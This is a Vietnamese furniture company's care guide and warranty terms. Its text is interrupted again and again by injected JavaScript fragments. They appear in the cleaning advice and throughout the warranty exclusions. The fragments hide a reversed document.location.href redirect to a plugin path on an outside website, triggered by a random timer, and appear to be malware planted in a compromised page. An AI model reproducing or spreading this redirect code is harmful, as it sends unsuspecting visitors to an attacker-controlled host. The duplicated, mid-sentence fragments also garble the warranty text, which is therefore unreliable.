Chính sách bảo hành

CÔNG TY TNHH  THƯƠNG MẠI VÀ XÂY DỰNG PHÚ THÁI

Địa chỉ: 19 Cự Lộc – Thượng Đình – Thanh Xuân – Hà Nội

Điện thoại : 0466.863.519  – 0983.312.416 – 0943.452.907

Website: noithatphuthai.vn | bepphuthai.com.  Email: noithatphuthai1208@gmail.com

 

HƯỚNG DẪN SỬ DỤNG –  ĐIỀU KIỆN BẢO HÀNH  – PHIẾU BẢO HÀNH  ĐỒ GỖ NỘI THẤT

—oOo—

Với phương châm của chúng tôi “ khách hàng là thượng đế, phục vụ là trách nhiệm”. Vì vậy, các sản phẩm của  Công ty TNHH Thương mại và xây dựng Phú Thái  sản xuất, gia công bao gồm tất cả các loại đồ gỗ gia đình, nội thất văn phòng, Nhà hàng, khách sạn, resort của Quý Khách sẽ được chúng tôi bảo hành tùy theo chất liệu gỗ, bảo hành riêng theo sản phẩm., bảo hành đúng như cam kết khi Quý khách mua hàng.

Quy trình sản xuất ra thành phẩm được nhà sản xuất chú trọng từ công đoạn đầu tiên đến công đoạn cuối cùng nhằm đảm bảo chất lượng và giá cả hợp lý của sản phẩm. Chúng tôi cam kết sản phẩm của Quý khách sẽ được bảo hành với một chế độ bảo hành đảm bảo và tin tưởng nhất. Dịch vụ hậu mãi và chăm sóc khách hàng tốt nhất. Cảm ơn Quý khách hàng đã quan tâm đến dịch vụ của chúng tôi !

  1. Hướng dẫn sử dụng:

Sản phẩm của Công ty TNHH Thương mại và xây dựng Phú Thái luôn đặt chất lượng lên hàng đầu nhưng chúng vẫn yêu cầu một số sự chăm sóc và bảo dưỡng hợp lý để bảo vệ khỏi bất kỳ vết trầy, vết ố, ăn mòn, mẻ, vỡ, rạn nứt, cong vênh.

Tránh va đập mạnh làm trầy sướt, bong tróc, nứt vở, hư hỏng bề mặt của sản phẩm.

– Bảo vệ đồ gỗ khỏi ẩm mốc: đồ gỗ nội thất rất kỵ độ ẩm, Độ ẩm cao dẫn đến phồng rộp, cong vênh, rạng nứt, làm sinh sôi nấm mốc. Nên dùng máy hút ẩm để duy trì độ ẩm trong phòng đều đặn khoản 50%.

– Tránh để đồ gỗ tiếp xúc trực tiếp với ánh năng mặt trời, với nước, với các thiết bị gây cháy.

– Không nên dùng chất tẩy rửa dùng cho toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toliet hoặc sàn gạch men, chất tẩy rửa mạnh và chất làm sạch gốc axit, giấm để sử dụng làm sạch bề mặt.

  1. Điều kiện bảo hành:

– Bảo hành sản phẩm: Tất cả các sản phẩm đồ gỗ nội thất của Công ty TNHH Thương mại và xây dựng Phú Thái được bảo hành 12 tháng khi sản phẩm bị cong vênh, co ngót, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do kỹ thuật thi công lắp đăt trong điều kiện sử dụng bình thường.

– Sản phẩm bị bong tróc, nứt vở, hư hỏng bề mặt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do đội ngũ lắp đặt Nội thất Phú Thái thi công không đúng quy trình kỹ thuật gây ra.

– Công ty TNHH Thương mại và xây dựng Phú Thái  không có trách nhiệm bảo hành trong các trường hợp sau:

+ Sử dụng không phù hợp và không đúng với mục đích sử dụng trong thiết kế.

+ Sử dụng không đúng quy định trong hướng dẫn sử dụng gây dơ bẩn, trầy xước, móp mó.

+ Hao mòn thông thường trong quá trình sử dụng (các mép cạnh không còn sắc nét, trầy xước toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do quá trình sử dụng, độ bóng và màu sắc mờ dần).

+ Do người sử dụng hoặc bên thứ 3 tác động gây hư hại và tự ý sửa chữa.

+ Do môi trường bên ngoài quá khô, quá ẩm, tiếp xúc trực tiếp với nước, với lửa, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do sử dụng chất tẩy rửa, dung môi có axit mạnh, hay các thiết bị khác gây nên.

+ Trong trường hợp bất khả kháng: Các hư hại toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do nền nhà biến dạn, tường đổ ngã, lún, nứt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tác động của hỏa hoạn, chiến tranh, động đất, sóng thần, xạc lở… hoặc thiên tai, bảo lụt…

+ Khi sản phẩm đặt trong môi trường ẩm ướt, ngâm nước hoặc trưc tiếp dưới ánh nắng mặt trời.

+ Lưu ý:

– Phiếu bảo hành này chỉ có giá trị trong phạm vi lãnh thổ Việt Nam.

– Mọi vấn đề phát sinh trong khi sử dụng chúng tôi cam kết sẽ khắc phục trong 48 giờ kể từ khi nhận được thông báo của khách hàng. Khách hàng không phải trả tiền cho việc bảo hành sản phẩm

Thời gian bảo hành: 12 tháng kể từ ngày bàn giao

Hà Nội, ngày  15  tháng 1 năm 2013